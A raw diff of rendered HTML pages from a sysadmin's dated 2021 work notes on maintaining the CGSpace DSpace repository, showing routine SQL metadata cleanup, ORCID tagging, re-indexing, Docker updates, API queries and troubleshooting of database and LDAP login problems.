</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
</span></span><span style="display:flex;"><span>UPDATE 484
</span></span></code></pre></div><ul>
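<li>A quick sanity check is to re-run the match as a count, which should come back zero (a sketch):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# SELECT COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
</span></span></code></pre></div><ul>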
<li>Also update some DOIs that use the <code>dx.doi.org</code> format, just to keep things uniform:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
UPDATE 469
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
</span></span><span style="display:flex;"><span>UPDATE 469
</span></span></code></pre></div><ul>
<li>Then start a full Discovery re-indexing to update the Feed the Future community item counts that have been stuck at 0 since we moved the three projects to be a subcommunity a few days ago:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 322m16.917s
user 226m43.121s
sys 3m17.469s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 322m16.917s
</span></span><span style="display:flex;"><span>user 226m43.121s
</span></span><span style="display:flex;"><span>sys 3m17.469s
</span></span></code></pre></div><ul>
<li>I learned how to use the OpenRXV API, which is just a thin wrapper around Elasticsearch:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explorer/api/search?scroll=1d&#39;</span> <span style="color:#ae81ff">\
</span><span style="color:#ae81ff"></span> -H &#39;Content-Type: application/json&#39; \
-d &#39;{
&#34;size&#34;: 10,
&#34;query&#34;: {
&#34;bool&#34;: {
&#34;filter&#34;: {
&#34;term&#34;: {
&#34;repo.keyword&#34;: &#34;CGSpace&#34;
}
}
}
}
}&#39;
$ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ==&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explorer/api/search?scroll=1d&#39;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span> -H &#39;Content-Type: application/json&#39; \
</span></span><span style="display:flex;"><span> -d &#39;{
</span></span><span style="display:flex;"><span> &#34;size&#34;: 10,
</span></span><span style="display:flex;"><span> &#34;query&#34;: {
</span></span><span style="display:flex;"><span> &#34;bool&#34;: {
</span></span><span style="display:flex;"><span> &#34;filter&#34;: {
</span></span><span style="display:flex;"><span> &#34;term&#34;: {
</span></span><span style="display:flex;"><span> &#34;repo.keyword&#34;: &#34;CGSpace&#34;
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}&#39;
</span></span><span style="display:flex;"><span>$ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ==&#39;</span>
</span></span></code></pre></div><ul>
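<li>Since the responses are raw Elasticsearch, the paging could be scripted by pulling the scroll ID out with jq (a sketch, assuming the wrapper passes through the standard <code>_scroll_id</code> field):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ scroll_id=$(curl -s -X POST &#39;https://cgspace.cgiar.org/explorer/api/search?scroll=1d&#39; -H &#39;Content-Type: application/json&#39; -d &#39;{&#34;size&#34;: 10}&#39; | jq -r &#39;._scroll_id&#39;)
</span></span><span style="display:flex;"><span>$ curl -s -X POST &#34;https://cgspace.cgiar.org/explorer/api/search/scroll/$scroll_id&#34;
</span></span></code></pre></div><ul>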
<li>This uses the Elasticsearch scroll ID to page through results
<ul>
<li>The second query doesn&rsquo;t need the request body because it is saved for 1 day as part of the first request</li>
@ -525,46 +525,46 @@ $ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explor
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-08-25-combined-orcids.txt
$ wc -l /tmp/2021-08-25-combined-orcids.txt
1331
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-08-25-combined-orcids.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-08-25-combined-orcids.txt
</span></span><span style="display:flex;"><span>1331
</span></span></code></pre></div><ul>
<li>After I combined them and removed duplicates, I resolved all the names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
</span></span></code></pre></div><ul>
<li>Tag existing items from the Alliance&rsquo;s new authors with ORCID iDs using <code>add-orcid-identifiers-csv.py</code> (181 new metadata fields added):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-08-25-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Chege, Christine G. Kiria&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
&#34;Chege, Christine Kiria&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
&#34;Kiria, C.&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
&#34;Kinyua, Ivy&#34;,&#34;Ivy Kinyua :0000-0002-1978-8833&#34;
&#34;Rahn, E.&#34;,&#34;Eric Rahn: 0000-0001-6280-7430&#34;
&#34;Rahn, Eric&#34;,&#34;Eric Rahn: 0000-0001-6280-7430&#34;
&#34;Jager M.&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
&#34;Jager, M.&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
&#34;Jager, Matthias&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
&#34;Waswa, Boaz&#34;,&#34;Boaz Waswa: 0000-0002-0066-0215&#34;
&#34;Waswa, Boaz S.&#34;,&#34;Boaz Waswa: 0000-0002-0066-0215&#34;
&#34;Rivera, Tatiana&#34;,&#34;Tatiana Rivera: 0000-0003-4876-5873&#34;
&#34;Andrade, Robert&#34;,&#34;Robert Andrade: 0000-0002-5764-3854&#34;
&#34;Ceccarelli, Viviana&#34;,&#34;Viviana Ceccarelli: 0000-0003-2160-9483&#34;
&#34;Ceccarellia, Viviana&#34;,&#34;Viviana Ceccarelli: 0000-0003-2160-9483&#34;
&#34;Nyawira, Sylvia&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
&#34;Nyawira, Sylvia S.&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
&#34;Nyawira, Sylvia Sarah&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
&#34;Groot, J.C.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
&#34;Groot, J.C.J.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
&#34;Groot, Jeroen C.J.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
&#34;Groot, Jeroen CJ&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
&#34;Abera, W.&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
&#34;Abera, Wuletawu&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
&#34;Kanyenga Lubobo, Antoine&#34;,&#34;Antoine Lubobo Kanyenga: 0000-0003-0806-9304&#34;
&#34;Lubobo Antoine, Kanyenga&#34;,&#34;Antoine Lubobo Kanyenga: 0000-0003-0806-9304&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><h2 id="2021-08-29">2021-08-29</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-08-25-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Chege, Christine G. Kiria&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
</span></span><span style="display:flex;"><span>&#34;Chege, Christine Kiria&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
</span></span><span style="display:flex;"><span>&#34;Kiria, C.&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
</span></span><span style="display:flex;"><span>&#34;Kinyua, Ivy&#34;,&#34;Ivy Kinyua :0000-0002-1978-8833&#34;
</span></span><span style="display:flex;"><span>&#34;Rahn, E.&#34;,&#34;Eric Rahn: 0000-0001-6280-7430&#34;
</span></span><span style="display:flex;"><span>&#34;Rahn, Eric&#34;,&#34;Eric Rahn: 0000-0001-6280-7430&#34;
</span></span><span style="display:flex;"><span>&#34;Jager M.&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
</span></span><span style="display:flex;"><span>&#34;Jager, M.&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
</span></span><span style="display:flex;"><span>&#34;Jager, Matthias&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
</span></span><span style="display:flex;"><span>&#34;Waswa, Boaz&#34;,&#34;Boaz Waswa: 0000-0002-0066-0215&#34;
</span></span><span style="display:flex;"><span>&#34;Waswa, Boaz S.&#34;,&#34;Boaz Waswa: 0000-0002-0066-0215&#34;
</span></span><span style="display:flex;"><span>&#34;Rivera, Tatiana&#34;,&#34;Tatiana Rivera: 0000-0003-4876-5873&#34;
</span></span><span style="display:flex;"><span>&#34;Andrade, Robert&#34;,&#34;Robert Andrade: 0000-0002-5764-3854&#34;
</span></span><span style="display:flex;"><span>&#34;Ceccarelli, Viviana&#34;,&#34;Viviana Ceccarelli: 0000-0003-2160-9483&#34;
</span></span><span style="display:flex;"><span>&#34;Ceccarellia, Viviana&#34;,&#34;Viviana Ceccarelli: 0000-0003-2160-9483&#34;
</span></span><span style="display:flex;"><span>&#34;Nyawira, Sylvia&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
</span></span><span style="display:flex;"><span>&#34;Nyawira, Sylvia S.&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
</span></span><span style="display:flex;"><span>&#34;Nyawira, Sylvia Sarah&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
</span></span><span style="display:flex;"><span>&#34;Groot, J.C.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
</span></span><span style="display:flex;"><span>&#34;Groot, J.C.J.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
</span></span><span style="display:flex;"><span>&#34;Groot, Jeroen C.J.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
</span></span><span style="display:flex;"><span>&#34;Groot, Jeroen CJ&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
</span></span><span style="display:flex;"><span>&#34;Abera, W.&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
</span></span><span style="display:flex;"><span>&#34;Abera, Wuletawu&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
</span></span><span style="display:flex;"><span>&#34;Kanyenga Lubobo, Antoine&#34;,&#34;Antoine Lubobo Kanyenga: 0000-0003-0806-9304&#34;
</span></span><span style="display:flex;"><span>&#34;Lubobo Antoine, Kanyenga&#34;,&#34;Antoine Lubobo Kanyenga: 0000-0003-0806-9304&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><h2 id="2021-08-29">2021-08-29</h2>
<ul>
<li>Run a full harvest on AReS</li>
<li>Also did more work on OpenRXV over the past few days

View File

@ -48,7 +48,7 @@ The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search qu
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -154,9 +154,9 @@ The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search qu
<ul>
<li>Update Docker images on AReS server (linode20) and rebuild OpenRXV:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose build
</span></span></code></pre></div><ul>
<li>Then run system updates and reboot the server
<ul>
<li>After the system came back up I started a fresh re-harvesting</li>
@ -201,8 +201,8 @@ $ docker-compose build
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ vipsthumbnail ARRTB2020ST.pdf -s x600 -o <span style="color:#e6db74">&#39;%s.jpg[Q=85,optimize_coding,strip]&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ vipsthumbnail ARRTB2020ST.pdf -s x600 -o <span style="color:#e6db74">&#39;%s.jpg[Q=85,optimize_coding,strip]&#39;</span>
</span></span></code></pre></div><ul>
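<li>The PDF&rsquo;s metadata can be inspected with pdfinfo from poppler-utils (a sketch):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ pdfinfo ARRTB2020ST.pdf
</span></span></code></pre></div><ul>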
<li>Looking at the PDF&rsquo;s metadata I see:
<ul>
<li>Producer: iLovePDF</li>
@ -236,11 +236,11 @@ $ docker-compose build
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-09-15-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Kotchofa, Pacem&#34;,&#34;Pacem Kotchofa: 0000-0002-1640-8807&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuuu&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-09-15-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Kotchofa, Pacem&#34;,&#34;Pacem Kotchofa: 0000-0002-1640-8807&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuuu&#39;</span>
</span></span></code></pre></div><ul>
<li>Meeting with Leroy Mwanzia and some other Alliance people about depositing to CGSpace via API
<ul>
<li>I gave them some technical information about the CGSpace API and links to the controlled vocabularies and metadata registries we are using</li>
@ -273,42 +273,42 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_stat_activity&#39;</span> | wc -l
63
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_stat_activity&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>63
</span></span></code></pre></div><ul>
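<li>For reference, the number of active XMLUI sessions can be counted from the DSpace log by looking for unique session IDs (a sketch):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -oE &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2021-09-17 | sort -u | wc -l
</span></span></code></pre></div><ul>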
<li>Load on the server is under 1.0, and there are only about 1,000 XMLUI sessions, which seems to be normal for this time of day according to Munin</li>
<li>But the DSpace log file shows tons of database issues:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#34;Timeout waiting for idle object&#34;</span> dspace.log.2021-09-17
14779
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#34;Timeout waiting for idle object&#34;</span> dspace.log.2021-09-17
</span></span><span style="display:flex;"><span>14779
</span></span></code></pre></div><ul>
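<li>The first occurrence is easy to find with grep (a sketch):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -m1 &#39;Timeout waiting for idle object&#39; dspace.log.2021-09-17
</span></span></code></pre></div><ul>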
<li>The earliest one I see is around midnight (now is 2PM):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">2021-09-17 00:01:49,572 WARN org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-09-17 00:01:49,572 WARN org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
</span></span><span style="display:flex;"><span>2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
</span></span></code></pre></div><ul>
<li>But I was definitely logged into the site this morning so there were no issues then&hellip;</li>
<li>It seems that a few errors are normal, but there&rsquo;s obviously something wrong today:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#34;Timeout waiting for idle object&#34;</span> dspace.log.2021-09-*
dspace.log.2021-09-01:116
dspace.log.2021-09-02:163
dspace.log.2021-09-03:77
dspace.log.2021-09-04:13
dspace.log.2021-09-05:310
dspace.log.2021-09-06:0
dspace.log.2021-09-07:29
dspace.log.2021-09-08:86
dspace.log.2021-09-09:24
dspace.log.2021-09-10:26
dspace.log.2021-09-11:12
dspace.log.2021-09-12:5
dspace.log.2021-09-13:10
dspace.log.2021-09-14:102
dspace.log.2021-09-15:542
dspace.log.2021-09-16:368
dspace.log.2021-09-17:15235
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#34;Timeout waiting for idle object&#34;</span> dspace.log.2021-09-*
</span></span><span style="display:flex;"><span>dspace.log.2021-09-01:116
</span></span><span style="display:flex;"><span>dspace.log.2021-09-02:163
</span></span><span style="display:flex;"><span>dspace.log.2021-09-03:77
</span></span><span style="display:flex;"><span>dspace.log.2021-09-04:13
</span></span><span style="display:flex;"><span>dspace.log.2021-09-05:310
</span></span><span style="display:flex;"><span>dspace.log.2021-09-06:0
</span></span><span style="display:flex;"><span>dspace.log.2021-09-07:29
</span></span><span style="display:flex;"><span>dspace.log.2021-09-08:86
</span></span><span style="display:flex;"><span>dspace.log.2021-09-09:24
</span></span><span style="display:flex;"><span>dspace.log.2021-09-10:26
</span></span><span style="display:flex;"><span>dspace.log.2021-09-11:12
</span></span><span style="display:flex;"><span>dspace.log.2021-09-12:5
</span></span><span style="display:flex;"><span>dspace.log.2021-09-13:10
</span></span><span style="display:flex;"><span>dspace.log.2021-09-14:102
</span></span><span style="display:flex;"><span>dspace.log.2021-09-15:542
</span></span><span style="display:flex;"><span>dspace.log.2021-09-16:368
</span></span><span style="display:flex;"><span>dspace.log.2021-09-17:15235
</span></span></code></pre></div><ul>
<li>I restarted the server and DSpace came up fine&hellip; so it must have been some kind of fluke</li>
<li>Continue working on cleaning up and annotating the metadata registry on CGSpace
<ul>
@ -338,9 +338,9 @@ dspace.log.2021-09-17:15235
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
</code></pre></div><h2 id="2021-09-20">2021-09-20</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose build
</span></span></code></pre></div><h2 id="2021-09-20">2021-09-20</h2>
<ul>
<li>I synchronized the production CGSpace PostgreSQL, Solr, and Assetstore data with DSpace Test</li>
<li>Over the weekend a few users reported that they could not log into CGSpace
@ -349,10 +349,10 @@ $ docker-compose build
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;cgspace-ldap-account@cgiarad.org&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=someaccountnametocheck)&#34;</span>
Enter LDAP Password:
ldap_sasl_bind(SIMPLE): Can&#39;t contact LDAP server (-1)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;cgspace-ldap-account@cgiarad.org&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=someaccountnametocheck)&#34;</span>
</span></span><span style="display:flex;"><span>Enter LDAP Password:
</span></span><span style="display:flex;"><span>ldap_sasl_bind(SIMPLE): Can&#39;t contact LDAP server (-1)
</span></span></code></pre></div><ul>
<li>I sent a message to CGNET to ask about the server settings and see if our IP is still whitelisted
<ul>
<li>It turns out that CGNET created a new Active Directory server (AZCGNEROOT3.cgiarad.org) and decommissioned the old one last week</li>
@ -361,8 +361,8 @@ ldap_sasl_bind(SIMPLE): Can&#39;t contact LDAP server (-1)
</li>
<li>Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p <span style="color:#e6db74">&#39;fuuuuuuuu&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p <span style="color:#e6db74">&#39;fuuuuuuuu&#39;</span>
</span></span></code></pre></div><ul>
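<li>A quick REST login verifies that the new account works (a sketch using the DSpace 6 REST API):</li>
</ul>
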